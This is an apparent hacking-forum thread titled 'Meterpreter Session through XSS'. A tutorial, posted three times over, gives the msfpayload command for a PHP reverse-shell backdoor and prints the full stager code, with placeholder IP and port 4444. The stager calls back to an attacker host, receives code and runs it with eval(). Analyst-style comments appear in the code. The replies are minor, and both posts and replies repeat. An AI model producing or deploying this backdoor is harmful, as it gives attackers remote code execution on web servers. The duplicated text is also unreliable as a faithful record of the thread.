





The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.


Meterpreter Session through XSS
Meterpreter Session through XSS #1
NOTE: THIS IS A TUTORIAL I MADE ON ANOTHER HACK FORUM.

Shell XSS Tutorial

1.Open a terminal and enter "msfpayload php/meterpreter/reverse_tcp LHOST=IP HERE LPORT=4444 R >phpbackdoor.php".

[Image: 37719,rootbash006T6SXH.png]

2.Now, open a new terminal window and enter "msfconsole".

[Image: 37721,rootrubybin0073ASSS.png]

3.While waiting for the console to open enter "nano phpbackdoor.php" in the first terminal window. It will look like this when you open it:

[Image: 37722,rootnano0081SYK0.png]

Code:
#<?php
# Metasploit php/meterpreter/reverse_tcp stager as pasted in the post: it dials
# out to $ip:$port, reads a 4-byte length followed by that many bytes, and
# passes the received bytes to eval(). Nothing in this file authenticates or
# verifies what arrives over the socket.
# Triage indicators visible here: error_reporting(0), the 'msgsock' /
# 'msgsock_type' globals, and eval() on data read from an outbound TCP socket.

# Turns off PHP error reporting for this request, so the failures handled
# below are not reported.
error_reporting(0);
# The payload handler overwrites this with the correct LHOST before sending
# it to the victim.
$ip = 'IPHERE';
# Callback port; matches LPORT=4444 in the generating command on the page.
$port = 4444;
$ipf = AF_INET;

# A colon in the address is treated as an IPv6 literal.
if (FALSE !== strpos($ip, ":")) {
  # ipv6 requires brackets around the address
  $ip = "[". $ip ."]";
  $ipf = AF_INET6;
}

# Three connection APIs are tried in order and the first callable one is used.
# is_callable() is false for functions listed in disable_functions, so
# presumably the chain exists so that disabling one function alone does not
# stop the outbound connection; egress filtering on the web server does not
# depend on which API is used.
if (($f = 'stream_socket_client') && is_callable($f)) {
  $s = $f("tcp://{$ip}:{$port}");
  $s_type = 'stream';
} elseif (($f = 'fsockopen') && is_callable($f)) {
  $s = $f($ip, $port);
  $s_type = 'stream';
} elseif (($f = 'socket_create') && is_callable($f)) {
  $s = $f($ipf, SOCK_STREAM, SOL_TCP);
  # '@' suppresses the connect warning; a failed connect exits with no output.
  $res = @socket_connect($s, $ip, $port);
  if (!$res) { die(); }
  $s_type = 'socket';
} else {
  die('no socket funcs');
}
if (!$s) { die('no socket'); }

# First read: 4 bytes holding the size of the data that follows.
switch ($s_type) {
case 'stream': $len = fread($s, 4); break;
case 'socket': $len = socket_read($s, 4); break;
}
if (!$len) {
  # We failed on the main socket.  There's no way to continue, so
  # bail
  die();
}
# "N" decodes the 4 bytes as an unsigned 32-bit big-endian integer. The value
# is chosen by the remote peer and is used below without an upper bound.
$a = unpack("Nlen", $len);
$len = $a['len'];

# Accumulate reads until $len bytes have been received.
$b = '';
while (strlen($b) < $len) {
  switch ($s_type) {
  case 'stream': $b .= fread($s, $len-strlen($b)); break;
  case 'socket': $b .= socket_read($s, $len-strlen($b)); break;
  }
}

# Set up the socket for the main stage to use.
$GLOBALS['msgsock'] = $s;
$GLOBALS['msgsock_type'] = $s_type;
# Runs the received bytes as PHP inside the web server's PHP process. This file
# never writes them to disk, so a file scan of the host sees only this stager;
# the network connection and the PHP process are where the next stage shows up.
eval($b);
die();

4. Now, at the top of the file, remove the hash sign (#) from "#<?php" so that the line reads "<?php".


Meterpreter Session through XSS #2
NOTE: THIS IS A TUTORIAL I MADE ON ANOTHER HACK FORUM.

Shell XSS Tutorial

1.Open a terminal and enter "msfpayload php/meterpreter/reverse_tcp LHOST=IP HERE LPORT=4444 R >phpbackdoor.php".

[Image: 37719,rootbash006T6SXH.png]

2.Now, open a new terminal window and enter "msfconsole".

[Image: 37721,rootrubybin0073ASSS.png]

3.While waiting for the console to open enter "nano phpbackdoor.php" in the first terminal window. It will look like this when you open it:

[Image: 37722,rootnano0081SYK0.png]

Code:
#<?php
# Metasploit php/meterpreter/reverse_tcp stager as pasted in the post: it dials
# out to $ip:$port, reads a 4-byte length followed by that many bytes, and
# passes the received bytes to eval(). Nothing in this file authenticates or
# verifies what arrives over the socket.
# Triage indicators visible here: error_reporting(0), the 'msgsock' /
# 'msgsock_type' globals, and eval() on data read from an outbound TCP socket.

# Turns off PHP error reporting for this request, so the failures handled
# below are not reported.
error_reporting(0);
# The payload handler overwrites this with the correct LHOST before sending
# it to the victim.
$ip = 'IPHERE';
# Callback port; matches LPORT=4444 in the generating command on the page.
$port = 4444;
$ipf = AF_INET;

# A colon in the address is treated as an IPv6 literal.
if (FALSE !== strpos($ip, ":")) {
  # ipv6 requires brackets around the address
  $ip = "[". $ip ."]";
  $ipf = AF_INET6;
}

# Three connection APIs are tried in order and the first callable one is used.
# is_callable() is false for functions listed in disable_functions, so
# presumably the chain exists so that disabling one function alone does not
# stop the outbound connection; egress filtering on the web server does not
# depend on which API is used.
if (($f = 'stream_socket_client') && is_callable($f)) {
  $s = $f("tcp://{$ip}:{$port}");
  $s_type = 'stream';
} elseif (($f = 'fsockopen') && is_callable($f)) {
  $s = $f($ip, $port);
  $s_type = 'stream';
} elseif (($f = 'socket_create') && is_callable($f)) {
  $s = $f($ipf, SOCK_STREAM, SOL_TCP);
  # '@' suppresses the connect warning; a failed connect exits with no output.
  $res = @socket_connect($s, $ip, $port);
  if (!$res) { die(); }
  $s_type = 'socket';
} else {
  die('no socket funcs');
}
if (!$s) { die('no socket'); }

# First read: 4 bytes holding the size of the data that follows.
switch ($s_type) {
case 'stream': $len = fread($s, 4); break;
case 'socket': $len = socket_read($s, 4); break;
}
if (!$len) {
  # We failed on the main socket.  There's no way to continue, so
  # bail
  die();
}
# "N" decodes the 4 bytes as an unsigned 32-bit big-endian integer. The value
# is chosen by the remote peer and is used below without an upper bound.
$a = unpack("Nlen", $len);
$len = $a['len'];

# Accumulate reads until $len bytes have been received.
$b = '';
while (strlen($b) < $len) {
  switch ($s_type) {
  case 'stream': $b .= fread($s, $len-strlen($b)); break;
  case 'socket': $b .= socket_read($s, $len-strlen($b)); break;
  }
}

# Set up the socket for the main stage to use.
$GLOBALS['msgsock'] = $s;
$GLOBALS['msgsock_type'] = $s_type;
# Runs the received bytes as PHP inside the web server's PHP process. This file
# never writes them to disk, so a file scan of the host sees only this stager;
# the network connection and the PHP process are where the next stage shows up.
eval($b);
die();

4. Now, at the top of the file, remove the hash sign (#) from "#<?php" so that the line reads "<?php".


Meterpreter Session through XSS #3
NOTE: THIS IS A TUTORIAL I MADE ON ANOTHER HACK FORUM.

Shell XSS Tutorial

1.Open a terminal and enter "msfpayload php/meterpreter/reverse_tcp LHOST=IP HERE LPORT=4444 R >phpbackdoor.php".

[Image: 37719,rootbash006T6SXH.png]

2.Now, open a new terminal window and enter "msfconsole".

[Image: 37721,rootrubybin0073ASSS.png]

3.While waiting for the console to open enter "nano phpbackdoor.php" in the first terminal window. It will look like this when you open it:

[Image: 37722,rootnano0081SYK0.png]

Code:
#<?php
# Metasploit php/meterpreter/reverse_tcp stager as pasted in the post: it dials
# out to $ip:$port, reads a 4-byte length followed by that many bytes, and
# passes the received bytes to eval(). Nothing in this file authenticates or
# verifies what arrives over the socket.
# Triage indicators visible here: error_reporting(0), the 'msgsock' /
# 'msgsock_type' globals, and eval() on data read from an outbound TCP socket.

# Turns off PHP error reporting for this request, so the failures handled
# below are not reported.
error_reporting(0);
# The payload handler overwrites this with the correct LHOST before sending
# it to the victim.
$ip = 'IPHERE';
# Callback port; matches LPORT=4444 in the generating command on the page.
$port = 4444;
$ipf = AF_INET;

# A colon in the address is treated as an IPv6 literal.
if (FALSE !== strpos($ip, ":")) {
  # ipv6 requires brackets around the address
  $ip = "[". $ip ."]";
  $ipf = AF_INET6;
}

# Three connection APIs are tried in order and the first callable one is used.
# is_callable() is false for functions listed in disable_functions, so
# presumably the chain exists so that disabling one function alone does not
# stop the outbound connection; egress filtering on the web server does not
# depend on which API is used.
if (($f = 'stream_socket_client') && is_callable($f)) {
  $s = $f("tcp://{$ip}:{$port}");
  $s_type = 'stream';
} elseif (($f = 'fsockopen') && is_callable($f)) {
  $s = $f($ip, $port);
  $s_type = 'stream';
} elseif (($f = 'socket_create') && is_callable($f)) {
  $s = $f($ipf, SOCK_STREAM, SOL_TCP);
  # '@' suppresses the connect warning; a failed connect exits with no output.
  $res = @socket_connect($s, $ip, $port);
  if (!$res) { die(); }
  $s_type = 'socket';
} else {
  die('no socket funcs');
}
if (!$s) { die('no socket'); }

# First read: 4 bytes holding the size of the data that follows.
switch ($s_type) {
case 'stream': $len = fread($s, 4); break;
case 'socket': $len = socket_read($s, 4); break;
}
if (!$len) {
  # We failed on the main socket.  There's no way to continue, so
  # bail
  die();
}
# "N" decodes the 4 bytes as an unsigned 32-bit big-endian integer. The value
# is chosen by the remote peer and is used below without an upper bound.
$a = unpack("Nlen", $len);
$len = $a['len'];

# Accumulate reads until $len bytes have been received.
$b = '';
while (strlen($b) < $len) {
  switch ($s_type) {
  case 'stream': $b .= fread($s, $len-strlen($b)); break;
  case 'socket': $b .= socket_read($s, $len-strlen($b)); break;
  }
}

# Set up the socket for the main stage to use.
$GLOBALS['msgsock'] = $s;
$GLOBALS['msgsock_type'] = $s_type;
# Runs the received bytes as PHP inside the web server's PHP process. This file
# never writes them to disk, so a file scan of the host sees only this stager;
# the network connection and the PHP process are where the next stage shows up.
eval($b);
die();

4. Now, at the top of the file, remove the hash sign (#) from "#<?php" so that the line reads "<?php".


RE: Meterpreter Session through XSS #4
I would advise using the code tags to make the thread look nicer.


RE: Meterpreter Session through XSS #5
I would advise using the code tags to make the thread look nicer.


RE: Meterpreter Session through XSS #6
I would advise using the code tags to make the thread look nicer.


RE: Meterpreter Session through XSS #7
(10-24-2013, 03:58 PM)Ergo Proxy Wrote: I would advise using the code tags to make the thread look nicer.

Okay, thanks!


RE: Meterpreter Session through XSS #8
(10-24-2013, 03:58 PM)Ergo Proxy Wrote: I would advise using the code tags to make the thread look nicer.

Okay, thanks!


RE: Meterpreter Session through XSS #9
(10-24-2013, 03:58 PM)Ergo Proxy Wrote: I would advise using the code tags to make the thread look nicer.

Okay, thanks!


RE: Meterpreter Session through XSS #10
Does anyone know why I opened a Meterpreter session with my own PC when I tried to use the php/meterpreter/reverse_tcp payload, even though my other PC opened the link?

[Image: ip12.png]







